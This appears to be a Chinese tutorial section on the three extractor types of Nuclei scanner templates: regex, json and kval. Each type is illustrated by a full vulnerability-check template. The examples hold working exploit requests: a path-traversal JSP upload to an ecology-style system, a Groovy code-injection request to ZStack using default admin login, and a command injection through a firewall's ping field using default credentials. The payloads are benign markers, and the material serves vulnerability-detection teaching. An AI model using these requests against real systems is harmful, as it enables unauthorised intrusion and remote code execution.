数据提取

在涉及多个请求，下个请求需要上一个请求返回的某个数据，通常需要用到extractors。

正则提取

使用regex方式的extractors正则匹配取一个key。

requests:
  - raw:
      - |
        GET /xxxxxx/xxxxCheck.jsp HTTP/1.1
        Host: {{Hostname}}
        Cookie: ecology_JSessionid=aaaLXuU7E1S7Z6FlnKU0x; JSESSIONID=aaaLXuU7E1S7Z6FlnKU0x

      - |
        POST /xxxxxx/xxxxUpgrade.jsp?token={{key}} HTTP/1.1
        Host: {{Hostname}}
        Content-Length: 484
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryqL5A4OGzXYd4PAHA

        ------WebKitFormBoundaryqL5A4OGzXYd4PAHA
        Content-Disposition: form-data; name="method"

        upgrade
        ------WebKitFormBoundaryqL5A4OGzXYd4PAHA
        Content-Disposition: form-data; name="upload"; filename="../../{{randstr_1}}.jsp"
        Content-Type: application/octet-stream

        <%@ page contentType="text/html;charset=UTF-8"%>  
        <%
        out.println("{{randstr_2}}" + "{{randstr_3}}");
        new java.io.File(application.getRealPath(request.getServletPath())).delete();
        %>
        ------WebKitFormBoundaryqL5A4OGzXYd4PAHA--

    extractors:
      - type: regex
        name: key
        part: body
        internal: true
        regex:
          - "[a-z0-9]{80,}"

    req-condition: true
    matchers:
      - type: dsl
        dsl:
          - 'status_code_1 == 200 && status_code_2 == 200'
          - 'contains(body_1, "timestamp") && contains(body_1, "status") && contains(body_1, "key")'
          - '!contains(body_2, "error") || !contains(body_2, "安全校验失败")'
        condition: and

json提取

使用json方式的extractors提取一个uuid。

requests:
  - raw:
      - |
        PUT /zstack/v1/accounts/login HTTP/1.1
        Host: {{Hostname}}
        Content-Length: 209

        {
        "logInByAccount": {
            "password": "b109f3bbbc244eb82441917ed06d618b9008dd09b3befd1b5e07394c706a8bb980b1d7785e5976ec049b46df5f1326af5a2ea6d103fd07c95385ffab0cacbc86",
            "accountName": "admin"
        }
        }

      - |
        GET /zstack/v1/batch-queries?script=@groovy.transform.ASTTest(value=%7Bassert%20java.lang.Runtime.getRuntime()%7D)%20def%20x HTTP/1.1
        Host: {{Hostname}}
        Authorization: OAuth {{authuuid}}
        x-forwarded-for: 127.0.0.1
        x-originating-ip: 127.0.0.1
        x-remote-ip: 127.0.0.1
        x-remote-addr: 127.0.0.1

    extractors:
      - type: json
        name: authuuid
        part: body
        internal: true
        json:
          - '."inventory" | ."uuid"'
    # extractors:
    #   - type: regex
    #     name: authuuid
    #     part: body
    #     internal: true
    #     group: 1
    #     regex:
    #       - '"uuid":"\s*(.*?)\s*","'

    req-condition: true
    matchers:
      - type: dsl
        dsl:
          - 'status_code_1 == 200 && contains(body_1, "inventory") && contains(body_1, "uuid")'
          - 'status_code_2 == 503 && contains(body_2, "SYS.1006")'
        condition: and

kval提取

使用kval方式的extractors取PHPSESSID和FWSESSID。

requests:
  - raw:
      - |
        POST /index.php?c=user&a=ajax_save HTTP/1.1
        Host: {{Hostname}}
        Content-Length: 49
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8

        username=admin&password=hicomadmin&language=zh-cn
      - |
        POST /index.php?c=maintain&a=ping HTTP/1.1
        Host: {{Hostname}}
        Cookie: FWSESSID={{fwsessid}}; PHPSESSID={{phpsessid}}; lange=zh-cn
        Content-Length: 52
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8

        interface=&destip=127.0.0.1%7Cecho+Mailgard%7Cmd5sum

    extractors:
      - type: kval
        name: fwsessid
        internal: true
        part: header
        kval:
          - FWSESSID
      - type: kval
        name: phpsessid
        internal: true
        part: header
        kval:
          - PHPSESSID

    req-condition: true
    matchers:
      - type: dsl
        dsl:
          - "status_code==200"
          - "contains((body_2), '2dba20b780cb70f9fea723ecfb6aad96')"
        condition: and